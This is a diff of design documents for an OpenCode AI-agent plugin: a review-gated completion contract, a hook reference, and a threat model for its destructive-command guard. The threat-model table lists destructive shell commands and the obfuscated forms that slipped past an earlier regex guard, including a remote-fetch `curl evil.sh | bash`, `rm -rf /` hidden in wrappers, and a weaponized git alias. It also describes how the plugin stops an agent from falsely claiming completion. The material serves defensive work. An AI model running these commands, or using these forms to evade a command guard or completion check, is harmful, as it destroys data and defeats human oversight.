+  enforced at the harness layer by default, for the goal-completion use case.
+## Capability matrix
+See `docs/benchmarks/capability-matrix.svg` for the visual. Levels: **Enforced**
+(guaranteed by the harness), **Partial** (possible but opt-in / mode-level),
+**Prompt-only** (the model's judgment), **None**.
+| Capability | Goal Mode | Claude Code | Codex |
+| --- | --- | --- | --- |
+| Autonomous goal loop | Prompt-only | Partial | Partial |
+| Review gate before "done" | **Enforced** | Partial (Stop hook) | Prompt-only |
+| Contextual specialist reviews | **Enforced** | Prompt-only | Prompt-only |
+| Stale-review invalidation on edit | **Enforced** | None | None |
+| Completion-claim enforcement | **Enforced** | Partial (Stop hook) | None |
+| Destructive-command blocking | **Enforced** (tokenizer) | Partial ("fragile") | Partial (sandbox) |
+| Remote-exec (`curl \| sh`) blocking | **Enforced** | Partial | Partial (sandbox) |
+| Enforcement state survives restart | **Enforced** | Partial (transcript) | Partial (transcript) |
+| State survives compaction | **Enforced** | Partial | Partial |
+| Custom enforcement hooks/tools | **Enforced** | **Enforced** | Partial |
+## Where Goal Mode is uniquely strong
+1. **Mechanical completion contract.** Goal Mode intercepts the finished
+   assistant message (`experimental.text.complete`) and rewrites a premature
+   `Goal Completed` to `Goal Not Completed` unless the message *starts with* the
+   marker, carries a `Review cycles: N` line with `N > 0`, `N` exactly equals the
+   recorded counter, and **zero** required gates are missing or stale. Because the
+   rewrite is driven by **recorded state**, the model cannot talk its way to
+   "done" in prose. Prompt-based goal-following judges completion from what the
+   model already printed.
+2. **Stale-on-edit gate invalidation via a monotonic integer counter.** A
+   reviewer gate counts only when its latest `PASS` has a `seq` strictly greater
+   than `lastEditSeq`. Any edit — file write, mutating bash command, or a
+   subagent `file.edited` event — bumps the counter, so a `PASS` can never be
+   credited against an edit it did not actually follow. Integer ordering means
+   two same-millisecond events can't tie. The public Claude Code and Codex docs
+   reviewed do not describe an equivalent "an edit invalidates prior approvals"
+   invariant.
+3. **Contextual specialist reviews are required, not suggested.** A whole-word
+   keyword scan of the goal text + Goal Contract + changed-file names selects
+   specialists (auth/token → security, api/schema → api, migration/sql → data,
+   perf/latency → performance) and makes them a precondition for completion,
+   sticky so a later context truncation cannot silently drop a required gate.
+4. **Destructive-command blocking by a real shell tokenizer.** The guard unwraps
+   `sudo`/`env`/`timeout`/`xargs`, recurses into `$(…)`/backticks and
+   `bash -c`/`eval`, resolves `/bin/rm` to its basename, parses `git -C` and
+   weaponized `git -c alias.x='!rm -rf /' x`, and inspects interpreter sinks.
+   Claude Code's own docs warn that Bash argument-matching can be **"fragile"**
+   for hard enforcement and recommend permissions for hard allow/deny policy;
+   there, these bypass classes are not unwrapped unless a user-authored
+   PreToolUse hook does it.
+## Honest caveats
+- **The autonomous loop is prompt-only**, like Claude's and Codex's. What is
+  mechanical is the *completion gate* and the *command guard*, not the model's
+  decision to keep working.
+- **Codex's isolated execution model is a stronger boundary** than a tool-layer
+  classifier where it applies. Goal Mode's guard falls back to "not blocked" on a
+  parse failure (deferring to the host's permission rules); it is
+  defense-in-depth, not a jail.
+- **Claude Code can do equivalent enforcement** when a user wires Stop/PreToolUse
+  hooks themselves. Goal Mode's advantage is that a coherent set ships working
+  out of the box for this use case.
+- Gate freshness is only as trustworthy as the reviewer subagents' verdicts. The
+  guard records *that* a fresh `PASS` exists with the right sequence; it cannot
+  verify the reviewer reasoned correctly.
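
Reviewer sketch (not part of the package): the completion contract and the stale-on-edit invariant described in `goal-mode-comparison.md` can be illustrated roughly as below. All names (`createGateState`, `recordEdit`, `recordPass`, `staleGates`, `enforceCompletion`) are hypothetical and chosen for illustration; the real plugin's state module may be organized quite differently.

```javascript
// Hypothetical illustration of the stale-on-edit gate invariant.
// None of these names are taken from the package source.
const MARKER = "Goal Completed";

function createGateState(requiredGates) {
  return { seq: 0, lastEditSeq: 0, reviewCycles: 0, required: [...requiredGates], lastPass: {} };
}

// Any edit bumps the shared counter and records where the edit landed.
function recordEdit(state) {
  state.seq += 1;
  state.lastEditSeq = state.seq;
}

// A reviewer PASS is stamped with the next sequence number.
function recordPass(state, gate) {
  state.seq += 1;
  state.lastPass[gate] = state.seq;
}

function recordReviewCycle(state) {
  state.reviewCycles += 1;
}

// A gate is fresh only if its latest PASS is strictly newer than the last edit.
// Gates with no PASS at all are reported as well.
function staleGates(state) {
  return state.required.filter((gate) => !(state.lastPass[gate] > state.lastEditSeq));
}

// Rewrite a premature completion marker based on recorded state, not prose.
function enforceCompletion(state, text) {
  if (!text.includes(MARKER)) return text;
  const match = /^Review cycles:\s*(\d+)\s*$/m.exec(text);
  const claimed = match ? Number(match[1]) : 0;
  const ok =
    text.startsWith(MARKER) &&
    claimed > 0 &&
    claimed === state.reviewCycles &&
    staleGates(state).length === 0;
  return ok ? text : text.split(MARKER).join("Goal Not Completed");
}
```

In this sketch a `PASS` recorded before an edit can never satisfy the gate afterwards, because the edit always receives a larger sequence number than any earlier verdict.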

package/research/opencode-plugin-platform.md ADDED

@@ -0,0 +1,89 @@
+# OpenCode plugin platform — verified reference
+Facts verified against `@opencode-ai/plugin@1.15.13` (the installed type
+definitions) and the `sst/opencode` source at tag `v1.15.13`. This is the
+pinned runtime reference the `goal-guard` plugin is engineered against; the npm
+latest was `1.16.2` when this document was refreshed, so claims below are
+version-scoped unless explicitly called out as current-docs behavior.
+Primary sources: OpenCode schema (`https://opencode.ai/config.json`), OpenCode
+config/agents/plugins docs (`https://opencode.ai/docs/config/`,
+`https://opencode.ai/docs/agents/`, `https://opencode.ai/docs/plugins/`),
+plugin source at `https://raw.githubusercontent.com/sst/opencode/v1.15.13/`,
+and npm metadata for `@opencode-ai/plugin`.
+## Plugin discovery
+- Auto-discovery glob is `{plugin,plugins}/*.{ts,js}` — **single level only**
+  (`config/plugin.ts`). Files directly under `plugins/` become plugins; files
+  in **subdirectories** (e.g. `plugins/goal-guard/state.js`) are **not**
+  auto-loaded. This is what lets Goal Mode ship a multi-file plugin: the entry
+  `plugins/goal-guard.js` imports its modules from `plugins/goal-guard/`
+  relatively, and those modules are never treated as standalone plugins.
+- Scanned directories include `~/.config/opencode`, every `.opencode` from the
+  session directory up to the worktree, `~/.opencode`, and `$OPENCODE_CONFIG_DIR`.
+- TypeScript plugins load natively (Bun); no build step is required.
+- The config `plugin` array also accepts npm package names and `["spec", options]`
+  tuples; the second tuple element arrives as the plugin factory's second arg.
+  Auto-discovered plugins receive `options === undefined`.
+- Current OpenCode docs prefer plural config directories such as
+  `.opencode/plugins/`; singular directories are backward-compatible.
+## Hooks (the ones Goal Mode uses)
+| Hook | Input → Output | Notes |
+| --- | --- | --- |
+| `chat.message` | `{sessionID, agent?}` → `{message, parts}` | Captures the user's goal text. |
+| `chat.params` | `{sessionID, agent, model, …}` → params | Tracks the current agent. |
+| `experimental.chat.system.transform` | `{sessionID?, model}` → `{system: string[]}` | Inject system-prompt strings. |
+| `tool.execute.before` | `{tool, sessionID, callID}` → `{args}` | **Throwing blocks the tool** and the thrown message becomes the tool's error result shown to the model. `args` are on the **output**, not the input. Mutate `output.args` in place. |
+| `tool.execute.after` | `{tool, sessionID, callID, args}` → `{title, output, metadata}` | The `task` tool's output wraps the subagent text in `<task><task_result>…</task_result></task>`. |
+| `experimental.text.complete` | `{sessionID, messageID, partID}` → `{text}` | The returned `text` **is persisted** to the transcript. No `agent` field — gate on tracked `active` state. |
+| `experimental.session.compacting` | `{sessionID}` → `{context: string[], prompt?}` | Append preservation context. |
+| `event` | `{event}` | Directory-scoped; `file.edited`, `session.idle`, etc. `file.edited` carries `{file}` and **no** sessionID. |
+| `tool` | `{ [id]: ToolDefinition }` | Custom tools; the object key is the tool name verbatim. `tool.schema` is zod. |
+## Critical version-specific facts
+- **`permission.ask` is dormant in 1.15.13.** The hook is declared in the type
+  but has **zero trigger sites** in the runtime. A guard must enforce via
+  `tool.execute.before` throws, not this hook.
+- **Subagent `task` runs in a NEW child session.** The `task` tool's
+  before/after fire in the **parent** session with the subagent's final text;
+  the subagent's own internal tool calls fire under the **child** sessionID.
+  This is why Goal Mode records review verdicts via the task path (parent) and
+  treats agent-path verdicts as same-session only.
+- **Agent frontmatter** (`{agent,agents}/**/*.md`, recursive): `model`,
+  `variant`, `temperature`, `top_p`, `prompt`, `description`, `mode`
+  (`primary|subagent|all`), `hidden`, `disable`, `color` (hex or theme literal),
+  `steps`, `options`, `permission`. **Unknown keys are silently folded into
+  `options`** — so a typo'd key disappears rather than erroring.
+  `ext_mcp_server_trust` is **not a real key**.
+- **Command frontmatter** (`{command,commands}/**/*.md`): `template`,
+  `description`, `agent`, `model`, `variant`, `subtask`. Unlike agents, a
+  **command with an unknown key throws** a parse error.
+- **Current built-in agents include `build`, `plan`, `general`, `explore`, and
+  `scout`.** Goal Mode allows delegation to the stock `explore`, `general`, and
+  `scout` subagents from its primary agent.
+- **Permissions** are last-matching-rule-wins; `deny` from any scope beats
+  `allow`. Per-tool pattern maps are supported for `bash`, `task`,
+  `external_directory`, etc.
+## State persistence
+There is **no** plugin key/value store. Plugins persist their own JSON; the XDG
+state dir (`$XDG_STATE_HOME/opencode/…`, default `~/.local/state`) is the
+durable location for it, as opposed to a disposable cache directory.
+`PluginInput.directory` is the session working dir; `PluginInput.worktree` is
+the git worktree root (a stable per-project key).
+## Pitfalls
+- Hooks run sequentially across plugins in load order, awaited one by one — a
+  throw in a `chat.*`/`text.complete` hook can break the turn, so keep them
+  defensive (Goal Mode wraps each in try/catch).
+- A failed dynamic `import()` of a plugin file is cached for the process; editing
+  a plugin requires restarting OpenCode.
+- `experimental.text.complete` runs at text-end; streaming deltas already
+  emitted the original text, so the rewrite is a final-form correction, not a
+  pre-display redaction.
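
Reviewer sketch (not part of the package): the hooks table above says a throw from `tool.execute.before` blocks the tool and that `args` live on the output object. A minimal plugin in that shape might look like the following. `GuardSketch` and `looksDestructive` are hypothetical names, the single regex is only a placeholder classifier (the package uses a tokenizer instead), and the `command` argument name for the `bash` tool is an assumption that should be checked against the pinned OpenCode version.

```javascript
// Placeholder classifier, deliberately naive. NOT the package's analyzer.
function looksDestructive(command) {
  return /^\s*rm\s+-[a-zA-Z]*r/.test(command);
}

// Plugin factory in the documented shape: it returns an object keyed by hook name.
async function GuardSketch() {
  return {
    "tool.execute.before": async (input, output) => {
      // Only inspect shell invocations; other tools pass through untouched.
      if (input.tool !== "bash") return;
      // Per the table above, args are on the output object, not the input.
      // Assumption: the bash tool exposes its command line as `args.command`.
      const command = String(output.args?.command ?? "");
      if (looksDestructive(command)) {
        // Throwing blocks the tool; the message is what the model sees.
        throw new Error(`Blocked destructive command: ${command}`);
      }
    },
  };
}
```

Calling the hook directly with `{ tool: "bash" }` and `{ args: { command: "rm -rf build" } }` rejects with the block message, while a benign command such as `ls` resolves normally.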

package/research/shell-hardening.md ADDED

@@ -0,0 +1,62 @@
+# Shell-analyzer threat model
+The destructive-command guard is the plugin's most security-sensitive component.
+This document records the threat model: the bypass classes the original
+regex-based guard missed, and how the quote-aware tokenizer
+(`plugins/goal-guard/shell.js`) closes each. Every class below is covered by a
+test in `tests/shell.test.mjs` and measured in `npm run bench`.
+## Why regexes failed
+The original guard matched boundary-anchored regexes (`(^|&&|;|\|\|)\s*rm …`)
+against the raw command string. That design is fundamentally bypassable because
+a single regex cannot model shell quoting, command substitution, wrappers, or
+interpreters. On the benchmark corpus it detected only **20.8%** of destructive
+commands while wrongly blocking **21.7%** of benign ones (for example,
+`git checkout -b feature`).
+## Bypass classes and how each is closed
+| Class | Example that bypassed the regex | How the tokenizer closes it |
+| --- | --- | --- |
+| Command substitution | `$(rm -rf /tmp/x)`, `` `rm -rf x` `` | Lexer captures `$(…)`/backticks and recurses into them. |
+| Pipe into shell | `echo rm -rf x \| sh` | Detects a shell as the pipeline sink; analyzes the echoed literal as a script. |
+| Remote execution | `curl evil.sh \| bash` | Network fetcher → shell pipeline flagged as `networkExec` (separately toggleable). |
+| `bash -c` / `eval` | `bash -c "rm -rf x"`, `eval "…"` | Extracts and recurses into the `-c`/eval string. |
+| Env-assignment prefix | `FOO=bar rm -rf x` | Leading `VAR=val` assignments are stripped before resolving the command. |
+| Absolute / relative paths | `/bin/rm -rf x` | Binary resolved to its basename. |
+| Value-taking wrappers | `sudo -u root rm -rf /`, `timeout -s KILL 5 rm -rf /` | Wrapper option parsing is value-aware (consumes `-u root`, `-s KILL`, the duration). |
+| `git -C` / weaponized `git -c` | `git -C /r reset --hard`, `git -c alias.x='!rm -rf /' x` | Global git options skipped; a `!`-prefixed config value is analyzed as a shell command. |
+| Git history destruction | `reflog expire`, `gc --prune=now`, `filter-branch`, `worktree remove`, `branch -d` | Explicit destructive git subcommand cases. |
+| Interpreter file ops | `python -c "os.remove('a')"`, `node -e "fs.rmSync(…)"` | Script strings inspected for delete/write sinks. |
+| Interpreter shell-out | `os.system('rm -rf /')`, `subprocess.run([...])`, `child_process.execSync(…)` | Exec sinks (call forms) extracted and the command analyzed. |
+| ANSI-C quoting | `$'\x72\x6d' -rf x` | `$'…'` decoded before lexing. |
+| Process substitution | `bash <(echo rm -rf x)` | Substitution analyzed as a script when fed to a shell. |
+| `printf %b` into a shell | `printf %b 'rm -rf /' \| sh` | Format spec stripped; remaining literal analyzed. |
+| `find -exec` at depth | `find . -exec rm {} +` | `rm` under `-exec` marked destructive (it runs against every matched path). |
+| Newline separators | `echo hi\nrm -rf x` | Newline is a command separator in the lexer. |
+## False positives the tokenizer also removed
+A guard that over-blocks is a guard that gets turned off. The tokenizer clears
+the regex guard's false positives:
+- `git checkout -b feature` / `git switch -c topic` — branch creation, not a
+  discard.
+- `echo "rm -rf /"` / `printf 'do not run rm -rf'` — quoted text is inert.
+- `grep 'git reset' .` / `cat notes.txt # git reset explained` — comments and
+  search terms are not commands.
+- `true #; rm -rf x` — `#` starts a comment.
+- `python -c 'print(platform.system())'` — a bare `system` mention is not a
+  shell-out (exec sinks require a call form; the analyzer fails open when no
+  literal command can be extracted).
+- `git config --get user.email` — read-only queries don't dirty the session.
+## Design principle: fail open, defense-in-depth
+The analyzer is a **tool-layer classifier**, not an OS sandbox. On a parse
+failure or an un-analyzable dynamic command it returns "not blocked" and defers
+to OpenCode's own permission rules. It is one layer of defense-in-depth that
+catches the overwhelmingly common destructive forms an agent emits — not a
+security jail. Over-blocking benign work is treated as a real cost, which is why
+the false-positive rate is held at zero on the corpus.
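
Reviewer sketch (not part of the package): a few of the rows above (env-assignment prefix, basename resolution, inert quoted text, `#` comments, fail-open on a parse failure) can be illustrated with a very small quote-aware word splitter. This is an assumption-laden toy, not `plugins/goal-guard/shell.js`: `tokenize` and `isDestructive` are hypothetical names, only a single simple command is handled (no `;`, `&&`, pipes, substitutions, or wrappers), and only recursive `rm` is recognized.

```javascript
// Split one simple command into words, honoring single and double quotes.
// Returns null on an unterminated quote so the caller can fail open.
function tokenize(command) {
  const words = [];
  let current = "";
  let inWord = false;
  let quote = null;
  for (const ch of command) {
    if (quote) {
      if (ch === quote) quote = null;
      else current += ch;
    } else if (ch === "'" || ch === '"') {
      quote = ch;
      inWord = true;
    } else if (ch === "#" && !inWord) {
      break; // an unquoted '#' at the start of a word begins a comment
    } else if (/\s/.test(ch)) {
      if (inWord) {
        words.push(current);
        current = "";
        inWord = false;
      }
    } else {
      current += ch;
      inWord = true;
    }
  }
  if (quote) return null;
  if (inWord) words.push(current);
  return words;
}

// Toy classifier: flags only recursive `rm` as the resolved command name.
function isDestructive(command) {
  const words = tokenize(command);
  if (words === null) return false; // parse failure: fail open
  let i = 0;
  // Skip leading VAR=value assignments (quoting of the assignment is ignored here).
  while (i < words.length && /^[A-Za-z_][A-Za-z0-9_]*=/.test(words[i])) i++;
  if (i >= words.length) return false;
  const name = words[i].split("/").pop(); // /bin/rm resolves to rm
  if (name !== "rm") return false;
  return words.slice(i + 1).some((w) => w === "--recursive" || /^-[A-Za-z]*[rR]/.test(w));
}
```

Because classification runs on words rather than the raw string, `echo "rm -rf /"` resolves to the command `echo` and is left alone, while `FOO=bar /bin/rm -rf x` resolves to `rm` and is flagged.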